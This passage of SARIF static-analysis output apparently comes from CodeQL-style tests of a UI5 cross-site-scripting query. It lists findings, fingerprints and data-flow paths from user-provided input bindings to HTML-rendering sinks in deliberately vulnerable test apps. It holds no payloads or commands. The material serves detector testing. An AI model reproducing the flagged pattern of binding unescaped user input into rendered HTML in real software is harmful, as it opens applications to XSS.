"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 14, - "startColumn" : 32, - "endColumn" : 50 - } - }, - "message" : { - "text" : 
"oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 14, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "352d5ec8b0c3bb0d:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 37 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 14, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 27, - "startColumn" : 36, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8ceecee7055f4fa2:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 25, - "endColumn" : 42 - } - }, - "message" : { - "text" : "oInput.getValue()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 17, - "endColumn" : 42 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 27, - "startColumn" : 36, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 25, - "endColumn" : 42 - } - }, - "message" : 
{ - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 360 - }, - "region" : { - "startLine" : 5, - "startColumn" : 15, - "endColumn" : 33 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - 
"message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 21, - "startColumn" : 22, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "5d5122f6c75b5d01:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 18, - "startColumn" : 20, - "endColumn" : 30 - } - }, - "message" : { - "text" : "/input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 21, - "startColumn" : 22, - "endColumn" : 32 - } - }, - "message" : { - "text" : "/input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 18, - "startColumn" : 20, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 13, - "startColumn" : 15, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "c18df3aa119b40dc:1", - "primaryLocationStartColumnFingerprint" : "11" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 9, - "startColumn" : 13, - "endColumn" : 23 - } - }, - "message" : { - "text" : "\"value\": \"{/input}\"" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - }, - "region" : { - 
"startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 13, - "startColumn" : 15, - "endColumn" : 25 - } - }, - "message" : { - "text" : "\"content\": \"{/input}\"" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 9, - "startColumn" : 13, - "endColumn" : 23 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 50 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "74b35e217af6aa05:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 50 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" 
: 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 9, - "startColumn" : 5, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "9caa0f252fbe2993:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 31, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 9, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 10, - "startColumn" : 44, - "endColumn" : 49 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 32, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "output1: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 9, - "startColumn" : 5, - "endColumn" : 40 - } - }, - "message" : { - "text" : "content={/output1}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - 
"toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 17, - "startColumn" : 5, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "2963bbd458e69924:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 31, - "endColumn" : 60 - } - }, - "message" : { - "text" : "oEvent. ... Value()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 60 - } - }, - "message" : { - "text" : "sInputValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 19, - "startColumn" : 44, - "endColumn" : 55 - } - }, - "message" : { - "text" : "sInputValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - 
"region" : { - "startLine" : 34, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "output3: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 17, - "startColumn" : 5, - "endColumn" : 40 - } - }, - "message" : { - "text" : "content={/output3}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 31, - "endColumn" : 60 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "97b29ed20ac04ff0:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : 
